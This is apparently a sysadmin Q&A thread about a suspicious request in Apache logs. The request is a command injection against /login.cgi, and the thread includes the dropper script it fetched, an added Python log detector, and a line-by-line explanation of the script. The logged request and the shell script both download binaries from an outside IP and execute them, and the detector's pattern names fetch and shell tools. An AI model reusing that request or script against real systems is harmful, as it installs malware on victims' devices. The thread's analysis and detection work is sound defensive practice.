I've been noticing on my servers apache logs, the following strange lines lately:
156.222.222.13 - - [08/Sep/2018:04:27:24 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://80.211.173.159/k%20-O%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$ HTTP/1.1" 400 0 "-" "LMAO/2.0"
So I made a custom Fail2Ban filter and started banning the IPs requesting these /login.cgi URLs.
But I was curious as to what they were trying to do, so I pulled the script they're trying to execute and I can't seem to figure out what exactly it does. Something about removing arch folders in /var and /tmp?
Anyway, here it is:
```sh
#!/bin/sh
u="asgknskjdgn"
bin_names="mmips mipsel arm arm7 powerpc x86_64 x86_32"
http_server="80.211.173.159"
http_port=80
cd /tmp/||cd /var/
for name in $bin_names
do
rm -rf $u
cp $SHELL $u
chmod 777 $u
>$u
wget http://$http_server:$http_port/$name -O -> $u
./$u $name
done
```
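Detection logic for the kind of request shown in the question, as an added example (not the asker's Fail2Ban filter): it parses Apache combined-format lines, percent-decodes the request target, and flags injected download-and-execute commands; the log lines and IP addresses are constructed samples, not real traffic.

```python
import re
from urllib.parse import unquote

# Apache "combined" log format: ip ident user [time] "METHOD target PROTO" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# A shell metacharacter followed by a fetch / chmod / interpreter, evaluated on the
# *decoded* target so that %20 and %27 cannot hide the injected command chain.
INJECT_RE = re.compile(r"[;|&`'\"]\s*(wget|curl|tftp|chmod|sh|busybox)\b", re.IGNORECASE)

# Constructed sample lines modelled on the request in the question (documentation-range IPs).
SAMPLE_LOG = [
    '203.0.113.5 - - [08/Sep/2018:04:27:24 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://198.51.100.7/k%20-O%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$ HTTP/1.1" 400 0 "-" "LMAO/2.0"',
    '203.0.113.9 - - [08/Sep/2018:04:28:01 +0200] "GET /login.cgi?cli=admin HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [08/Sep/2018:04:29:10 +0200] "GET /login.cgi?cli=x%27;curl%20http://198.51.100.7/k%7Csh%27 HTTP/1.1" 400 0 "-" "LMAO/2.0"',
    'garbage line that does not parse',
]

def parse_line(line):
    """Return the log fields as a dict, or None for a line that is not in combined format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def is_injection_attempt(line):
    """Return (source_ip, decoded_target) when the request carries a shell command chain, else None."""
    rec = parse_line(line)
    if rec is None:
        return None
    decoded = unquote(rec["target"])
    if INJECT_RE.search(decoded) is None:
        return None
    return rec["ip"], decoded

def offenders(lines, min_hits=1):
    """Count flagged requests per source IP, the input a ban decision (e.g. fail2ban) is made on."""
    counts = {}
    for line in lines:
        hit = is_injection_attempt(line)
        if hit:
            counts[hit[0]] = counts.get(hit[0], 0) + 1
    return {ip: n for ip, n in counts.items() if n >= min_hits}

if __name__ == "__main__":
    for ip, n in offenders(SAMPLE_LOG).items():
        print(f"{ip}: {n} injection attempt(s)")
```

Matching on the decoded target is the part a simple Fail2Ban regex gets wrong: the raw line contains `%27;wget%20`, so a pattern written against literal spaces or quotes will miss it.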
Best Answer
Line by line:

1. Establishes the `sh` shell, whichever that is, as the shebang line. `sh%20/tmp/ks` in the request overrides this, so this line is treated as a normal comment and ignored.
2. Declares an arbitrary name, presumably to avoid colliding with other filenames. I'm not sure why they wouldn't just use `mktemp`, but maybe that is not available on all platforms.
3. Enumerates several common CPU architectures.
4. The server which has the exploit.
5. Tries to change directory to somewhere your web server is likely to be able to create files. I believe SELinux will help with this, by enforcing much stricter rules about what the web server can do than the file system does on its own.
6. For each CPU architecture…
7. Removes previously tried exploit programs. Unnecessary because of the next line, so can be ignored.
8. Copies the current shell executable (`/bin/sh`). Can be ignored because of the line after next.
9. Makes everyone have full access to the new file. This should have been after the `wget` command, which is either a sign of a shell scripting newbie or a misdirection technique.
10. Empties out the file. Pointless because of the next line.
11. Overwrites the file with the exploit script for this architecture. `-O -> $u` could have been written `-O - > $u` (the hyphen indicates that the download should be written to standard output), which is equivalent to `-O $u`.
12. Runs the exploit script with the architecture as the first argument.
13. Ends the loop.
It looks like this is a trivial exploit attempt script, trying known exploits against various CPU platforms. I do not know why it overwrites `$u` three times, but those operations could simply be remains from an earlier iteration of the script. Presumably that earlier version had the exploits hard coded rather than dynamically served - the former is easier but almost guarantees that the script will be less effective over time as bugs are patched.